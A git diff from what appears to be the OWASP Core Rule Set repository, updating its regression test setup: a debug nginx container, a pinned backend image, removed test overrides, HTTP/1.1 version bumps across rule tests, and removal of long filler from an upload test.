     depends_on:
       - backend
 
+  modsec3-nginx-debug:
+    <<: *nginx
+    container_name: modsec3-nginx-debug
+    entrypoint: ["/bin/sh", "-c", "/bin/cp /etc/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/modsecurity.d/owasp-crs/crs-setup.conf && /docker-entrypoint.sh nginx-debug -g 'daemon off;'"]
+    environment:
+      <<: *nginx-env
+      MODSEC_DEBUG_LOG: "/var/log/nginx/modsec_debug.log"
+      MODSEC_DEBUG_LOGLEVEL: 9
+
   backend:
-    image: ghcr.io/coreruleset/albedo:0.0.14
+    image: ghcr.io/coreruleset/albedo:0.2.0@sha256:bc9b7e4f83a5268ccd2b4d1d26e926b6324e20ff1d91281c339ad82e55f5bab2
     command: ["--port", "80"]
diff --git a/tests/regression/CRS_Tests.py b/tests/regression/CRS_Tests.py
index 5b8255121..0b84eb91c 100644
--- a/tests/regression/CRS_Tests.py
+++ b/tests/regression/CRS_Tests.py
@@ -33,7 +33,7 @@ def try_once():
             self.mark_and_flush_log(stage_id)
             self.backwards_reader.reset()
             return self.backwards_reader.readline() or b''
-            
+
         line = try_once()
         while not (header_bytes in line and stage_id_bytes in line):
             line = try_once()
@@ -66,7 +66,7 @@ def mark_and_flush_log(self, header_value):
 
     @staticmethod
     def find_log_location(config):
-        key = 'log_location_linux' 
+        key = 'log_location_linux'
         # First, try to find the log configuration from config.ini
         if key in config:
             return config[key]
@@ -132,7 +132,7 @@ def readlines(self):
       while line:
           yield line
           line = self.readline()
-        
+
   def reset(self):
     # get the file size
     self.size = os.stat(self.file)[6]
diff --git a/tests/regression/README.md b/tests/regression/README.md
index b9b614963..7290a9b62 100644
--- a/tests/regression/README.md
+++ b/tests/regression/README.md
@@ -55,6 +55,8 @@ SecAction "id:900005,\
   setvar:tx.crs_validate_utf8_encoding=1,\
   setvar:tx.arg_name_length=100,\
   setvar:tx.arg_length=400,\
+  setvar:tx.total_arg_length=64000,\
+  setvar:tx.max_num_args=255,\
   setvar:tx.max_file_size=64100,\
   setvar:tx.combined_file_sizes=65535"
 ```
diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml
index b80d8b719..4c4c2bcab 100644
--- a/tests/regression/httpd-overrides.yaml
+++ b/tests/regression/httpd-overrides.yaml
@@ -19,10 +19,3 @@ test_overrides:
       status: 200
       log:
         no_expect_ids: [920380]
-  - rule_id: 920390
-    test_ids: [1]
-    reason: Exceeds PCRE limits, currently segfaults on the CI
-    output:
-      expect_error: true
-      log:
-        no_expect_ids: [920390]
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
index 21724795b..511b84100 100644
--- a/tests/regression/nginx-overrides.yaml
+++ b/tests/regression/nginx-overrides.yaml
@@ -37,15 +37,6 @@ test_overrides:
     reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present"
     output:
       status: 400
-  - rule_id: 920260
-    test_ids: [1, 3]
-    reason: |
-      Nginx replaces the `%u` in the URI with `\xf`. This might be a bug.
-      See https://github.com/owasp-modsecurity/ModSecurity/issues/3135
-    output:
-      status: 200
-      log:
-        no_expect_ids: [920260]
   - rule_id: 920270
     test_ids: [4]
     reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule"
@@ -79,13 +70,6 @@ test_overrides:
       status: 200
       log:
         no_expect_ids: [920280]
-  - rule_id: 920390
-    test_ids: [1]
-    reason: Exceeds PCRE limits
-    output:
-      status: 200
-      log:
-        no_expect_ids: [920390]
   - rule_id: 920430
     test_ids: [8]
     reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code."
@@ -104,12 +88,6 @@ test_overrides:
     output:
      log:
       expect_ids: [920620]
-  - rule_id: 930110
-    test_ids: [7]
-    reason: "nginx does not strip the dots from the URL (which httpd apparently does), hence ModSecurity sees them and the rule matches"
-    output:
-      log:
-        expect_ids: [930110]
   - rule_id: 933110
     test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27]
     reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
index 371b6ea40..62a2e22d0 100644
--- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
+++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
@@ -96,7 +96,7 @@ tests:
           method: DELETE
           port: 80
           uri: "/delete"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [911100]
@@ -116,7 +116,7 @@ tests:
           method: FOO
           port: 80
           uri: "/foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [911100]
@@ -136,7 +136,7 @@ tests:
           method: SUBSCRIBE
           port: 80
           uri: "/subscribe"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [911100]
diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml
index f7ec8046b..6c018fd47 100644
--- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml
+++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml
@@ -19,7 +19,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [913100]
@@ -39,7 +39,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [913100]
@@ -59,7 +59,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [913100]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
index 74d0073f8..61fc17e66 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
@@ -231,7 +231,7 @@ tests:
           method: '|GET'
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [920100]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml
index aa61ceb50..952334171 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml
@@ -74,7 +74,7 @@ tests:
           method: POST
           port: 80
           uri: /post
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: abc
         output:
           status: 200
@@ -97,7 +97,7 @@ tests:
           method: POST
           port: 80
           uri: /
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: abc
         output:
           status: 400
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml
index 0ed8225af..99004b126 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml
@@ -55,7 +55,7 @@ tests:
           method: POST
           port: 80
           uri: /
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [920180]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml
index 189f62708..73329addd 100755
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml
@@ -18,7 +18,7 @@ tests:
             Transfer-Encoding: "chunked"
             User-Agent: "OWASP CRS test agent"
           data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A"
-          stop_magic: true
+          autocomplete_headers: false
         output:
           # Apache unsets the Content-Length header if Transfer-Encoding is found!
           status: 200
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml
deleted file mode 100644
index e6e2bf592..000000000
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
----
-meta:
-  author: "Max Leske, azurit"
-  description: "Detect invalid URI encoding in the last path segment of the URI"
-rule_id: 920221
-tests:
-  - test_id: 1
-    desc: Detect invalid URI encoding in decoded URI (`%w20`)
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          port: 80
-          uri: "/get/%25w20"
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          version: "HTTP/1.1"
-        output:
-          log:
-            expect_ids: [920221]
-  - test_id: 2
-    desc: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`)
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          port: 80
-          uri: "/get/%25w20.txt"
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          version: "HTTP/1.1"
-        output:
-          log:
-            no_expect_ids: [920221]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml
index 074276e9f..9b1d4f126 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml
@@ -1,4 +1,6 @@
 ---
+# NOTE: these tests don't work with nginx on macOS (3.0.12), until the next release.
+# See https://github.com/owasp-modsecurity/ModSecurity/issues/3135#issuecomment-2099134853.
 meta:
   author: "csanders-git, azurit"
 rule_id: 920260
@@ -38,7 +40,7 @@ tests:
           dest_addr: "127.0.0.1"
           port: 80
           uri: "/get?param=foo%uFF01"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml
index 5ddeb17d6..38d375d9c 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml
@@ -102,20 +102,6 @@ tests:
           log:
             no_expect_ids: [920270]
   - test_id: 8
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          port: 80
-          uri: "/?test%FD=test1"
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          version: "HTTP/1.1"
-        output:
-          log:
-            no_expect_ids: [920270]
-  - test_id: 9
     desc: Test converted from old tests
     stages:
       - input:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml
index d418e938b..0269938fc 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml
@@ -8,6 +8,7 @@ tests:
       - input:
           dest_addr: "127.0.0.1"
           port: 80
+          # To test an empty Host: header we must use HTTP/1.0 version
           version: "HTTP/1.0"
           headers:
             User-Agent: "OWASP CRS test agent"
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml
index b5754ad85..97b6c3557 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml
@@ -19,7 +19,7 @@ tests:
           method: GET
           port: 80
           uri: "/"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: ''
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml
index 7f5384198..3d7c81dd4 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml
@@ -20,7 +20,7 @@ tests:
           method: GET
           port: 80
           uri: "/?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [920360]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml
index e7011333c..1003eeb9b 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml
@@ -21,7 +21,7 @@ tests:
           method: GET
           port: 80
           uri: /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [920370]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
index 2456b7a55..bb268d09a 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
@@ -20,7 +20,7 @@ tests:
           method: GET
           port: 80
           uri: /?param1=1&param2=1&param3=1&param4=1&param5=1&param6=1&param7=1&param8=1&param9=1&param10=1&param11=1&param12=1&param13=1&param14=1&param15=1&param16=1&param17=1&param18=1&param19=1&param20=1&param21=1&param22=1&param23=1&param24=1&param25=1&param26=1&param27=1&param28=1&param29=1&param30=1&param31=1&param32=1&param33=1&param34=1&param35=1&param36=1&param37=1&param38=1&param39=1&param40=1&param41=1&param42=1&param43=1&param44=1&param45=1&param46=1&param47=1&param48=1&param49=1&param50=1&param51=1&param52=1&param53=1&param54=1&param55=1&param56=1&param57=1&param58=1&param59=1&param60=1&param61=1&param62=1&param63=1&param64=1&param65=1&param66=1&param67=1&param68=1&param69=1&param70=1&param71=1&param72=1&param73=1&param74=1&param75=1&param76=1&param77=1&param78=1&param79=1&param80=1&param81=1&param82=1&param83=1&param84=1&param85=1&param86=1&param87=1&param88=1&param89=1&param90=1&param91=1&param92=1&param93=1&param94=1&param95=1&param96=1&param97=1&param98=1&param99=1&param100=1&param101=1&param102=1&param103=1&param104=1&param105=1&param106=1&param107=1&param108=1&param109=1&param110=1&param111=1&param112=1&param113=1&param114=1&param115=1&param116=1&param117=1&param118=1&param119=1&param120=1&param121=1&param122=1&param123=1&param124=1&param125=1&param126=1&param127=1&param128=1&param129=1&param130=1&param131=1&param132=1&param133=1&param134=1&param135=1&param136=1&param137=1&param138=1&param139=1&param140=1&param141=1&param142=1&param143=1&param144=1&param145=1&param146=1&param147=1&param148=1&param149=1&param150=1&param151=1&param152=1&param153=1&param154=1&param155=1&param156=1&param157=1&param158=1&param159=1&param160=1&param161=1&param162=1&param163=1&param164=1&param165=1&param166=1&param167=1&param168=1&param169=1&param170=1&param171=1&param172=1&param173=1&param174=1&param175=1&param176=1&param177=1&param178=1&param179=1&param180=1&param181=1&param182=1&param183=1&param184=1&param185=1&param186=1&param187=1&param188=1&param189=1&param190=1&param191=1&param192=1&param193=1&param194=1&param195=1&param196=1&param197=1&param198=1&param199=1&param200=1&param201=1&param202=1&param203=1&param204=1&param205=1&param206=1&param207=1&param208=1&param209=1&param210=1&param211=1&param212=1&param213=1&param214=1&param215=1&param216=1&param217=1&param218=1&param219=1&param220=1&param221=1&param222=1&param223=1&param224=1&param225=1&param226=1&param227=1&param228=1&param229=1&param230=1&param231=1&param232=1&param233=1&param234=1&param235=1&param236=1&param237=1&param238=1&param239=1&param240=1&param241=1&param242=1&param243=1&param244=1&param245=1&param246=1&param247=1&param248=1&param249=1&param250=1&param251=1&param252=1&param253=1&param254=1&param255=1&param256=1
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [920380]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml
index 07b08ad60..e9b75af44 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml
@@ -22,839 +22,7 @@ tests:
             ----------111111111
             Content-Disposition: form-data; name="bigfile"; filename="file.txt"
             Content-Type: text/plain
-
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
